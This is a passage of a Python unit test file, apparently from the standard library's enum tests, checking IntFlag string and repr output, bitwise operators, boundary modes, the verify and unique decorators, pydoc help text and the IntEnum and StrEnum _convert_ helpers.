self.assertEqual(str(~(Perm.R | 8)), '-13')
self.assertEqual(str(Perm(~0)), 'R|W|X')
self.assertEqual(str(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(Open(4)), '4')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
self.assertEqual(str(Open(~4)), '-5')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm.R | 8), '12')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(Perm(8)), '8')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(~(Perm.R | 8)), '-13')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(Open(4)), '4')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(repr(Open(~4)), '-5')
def test_global_repr_keep(self):
self.assertEqual(
repr(HeadlightsK(0)),
'%s.OFF_K' % SHORT_MODULE,
)
self.assertEqual(
repr(HeadlightsK(2**0 + 2**2 + 2**3)),
'%(m)s.LOW_BEAM_K|%(m)s.FOG_K|0x8' % {'m': SHORT_MODULE},
)
self.assertEqual(
repr(HeadlightsK(2**3)),
'%(m)s.HeadlightsK(0x8)' % {'m': SHORT_MODULE},
)
def test_global_repr_conform1(self):
self.assertEqual(
repr(HeadlightsC(0)),
'%s.OFF_C' % SHORT_MODULE,
)
self.assertEqual(
repr(HeadlightsC(2**0 + 2**2 + 2**3)),
'%(m)s.LOW_BEAM_C|%(m)s.FOG_C' % {'m': SHORT_MODULE},
)
self.assertEqual(
repr(HeadlightsC(2**3)),
'%(m)s.OFF_C' % {'m': SHORT_MODULE},
)
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
#
class NewPerm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
def __str__(self):
return self._name_
self.assertEqual(format(NewPerm.R, ''), 'R')
self.assertEqual(format(NewPerm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, (~i).value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_boundary(self):
self.assertIs(enum.IntFlag._boundary_, EJECT)
class Iron(IntFlag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(IntFlag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(IntFlag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
#
class Bizarre(IntFlag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'GREEN' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RW' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum memmbers before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertTrue(Color.GREEN in Open)
self.assertTrue(Open.RW in Color)
self.assertFalse('GREEN' in Color)
self.assertFalse('RW' in Open)
self.assertTrue(2 in Color)
self.assertTrue(2 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_default_missing(self):
with self.assertRaisesRegex(
ValueError,
"'RED' is not a valid TestIntFlag.Color",
) as ctx:
self.Color('RED')
self.assertIs(ctx.exception.__context__, None)
P = IntFlag('P', 'X Y')
with self.assertRaisesRegex(ValueError, "'X' is not a valid P") as ctx:
P('X')
self.assertIs(ctx.exception.__context__, None)
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestVerify(unittest.TestCase):
def test_continuous(self):
@verify(CONTINUOUS)
class Auto(Enum):
FIRST = auto()
SECOND = auto()
THIRD = auto()
FORTH = auto()
#
@verify(CONTINUOUS)
class Manual(Enum):
FIRST = 3
SECOND = 4
THIRD = 5
FORTH = 6
#
with self.assertRaisesRegex(ValueError, 'invalid enum .Missing.: missing values 5, 6, 7, 8, 9, 10, 12'):
@verify(CONTINUOUS)
class Missing(Enum):
FIRST = 3
SECOND = 4
THIRD = 11
FORTH = 13
#
with self.assertRaisesRegex(ValueError, 'invalid flag .Incomplete.: missing values 32'):
@verify(CONTINUOUS)
class Incomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 16
FORTH = 64
#
with self.assertRaisesRegex(ValueError, 'invalid flag .StillIncomplete.: missing values 16'):
@verify(CONTINUOUS)
class StillIncomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 11
FORTH = 32
def test_composite(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': aliases b and d are missing combined values of 0x3 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(Flag):
b = 3
c = 4
d = 6
#
self.assertEqual(enum.show_flag_values(3), [1, 2])
class Bizarre(IntFlag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': alias d is missing value 0x2 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(IntFlag):
c = 4
d = 6
self.assertEqual(enum.show_flag_values(2), [2])
def test_unique_clean(self):
@verify(UNIQUE)
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@verify(UNIQUE)
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@verify(UNIQUE)
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@verify(UNIQUE)
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestHelpers(unittest.TestCase):
sunder_names = '_bad_', '_good_', '_what_ho_'
dunder_names = '__mal__', '__bien__', '__que_que__'
private_names = '_MyEnum__private', '_MyEnum__still_private'
private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_'
random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__'
def test_sunder(self):
for name in self.sunder_names + self.private_and_sunder_names:
self.assertTrue(enum._is_sunder(name), '%r is a not sunder name?' % name)
for name in self.dunder_names + self.private_names + self.random_names:
self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name)
def test_dunder(self):
for name in self.dunder_names:
self.assertTrue(enum._is_dunder(name), '%r is a not dunder name?' % name)
for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names:
self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' % name)
def test_is_private(self):
for name in self.private_names + self.private_and_sunder_names:
self.assertTrue(enum._is_private('MyEnum', name), '%r is a not private name?')
for name in self.sunder_names + self.dunder_names + self.random_names:
self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?')
class TestEnumTypeSubclassing(unittest.TestCase):
pass
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumType:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumType:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumType),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(set(values.keys()), set(result.keys()))
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumType),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumType, object=EnumType.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
self.assertEqual(
len(values), len(result),
"%s != %s" % ([a.name for a in values], [a.name for a in result])
)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_test_simple_enum(self):
@_simple_enum(Enum)
class SimpleColor:
RED = 1
GREEN = 2
BLUE = 3
class CheckedColor(Enum):
RED = 1
GREEN = 2
BLUE = 3
self.assertTrue(_test_simple_enum(CheckedColor, SimpleColor) is None)
SimpleColor.GREEN._value_ = 9
self.assertRaisesRegex(
TypeError, "enum mismatch",
_test_simple_enum, CheckedColor, SimpleColor,
)
class CheckedMissing(IntFlag, boundary=KEEP):
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
CM = CheckedMissing
self.assertEqual(list(CheckedMissing), [CM.SIXTY_FOUR, CM.ONE_TWENTY_EIGHT, CM.TWENTY_FORTY_EIGHT])
#
@_simple_enum(IntFlag, boundary=KEEP)
class Missing:
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
M = Missing
self.assertEqual(list(CheckedMissing), [M.SIXTY_FOUR, M.ONE_TWENTY_EIGHT, M.TWENTY_FORTY_EIGHT])
#
_test_simple_enum(CheckedMissing, Missing)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum, not_exported={'bin', 'show_flag_values'})
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
CONVERT_STRING_TEST_NAME_D = 5
CONVERT_STRING_TEST_NAME_C = 5
CONVERT_STRING_TEST_NAME_B = 5
CONVERT_STRING_TEST_NAME_A = 5 # This one should sort first.
CONVERT_STRING_TEST_NAME_E = 5
CONVERT_STRING_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def setUp(self):
# Reset the module-level test variables to their original integer
# values, otherwise the already created enum values get converted
# instead.
for suffix in ['A', 'B', 'C', 'D', 'E', 'F']:
globals()[f'CONVERT_TEST_NAME_{suffix}'] = 5
globals()[f'CONVERT_STRING_TEST_NAME_{suffix}'] = 5
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')
and name not in dir(IntEnum)],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(python_version == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(python_version >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_TEST_'))
def test_convert_repr_and_str(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_STRING_TEST_'))
self.assertEqual(repr(test_type.CONVERT_STRING_TEST_NAME_A), '%s.CONVERT_STRING_TEST_NAME_A' % SHORT_MODULE)
self.assertEqual(str(test_type.CONVERT_STRING_TEST_NAME_A), 'CONVERT_STRING_TEST_NAME_A')
self.assertEqual(format(test_type.CONVERT_STRING_TEST_NAME_A), '5')
# global names for StrEnum._convert_ test
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
class TestStrEnumConvert(unittest.TestCase):
def setUp(self):
global CONVERT_STR_TEST_1
global CONVERT_STR_TEST_2
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
def test_convert(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_STR_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello')
self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye')
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')
and name not in dir(StrEnum)],
[], msg='Names other than CONVERT_STR_* found.')
def test_convert_repr_and_str(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
MODULE,
filter=lambda x: x.startswith('CONVERT_STR_'))
self.assertEqual(repr(test_type.CONVERT_STR_TEST_1), '%s.CONVERT_STR_TEST_1' % SHORT_MODULE)
self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye')
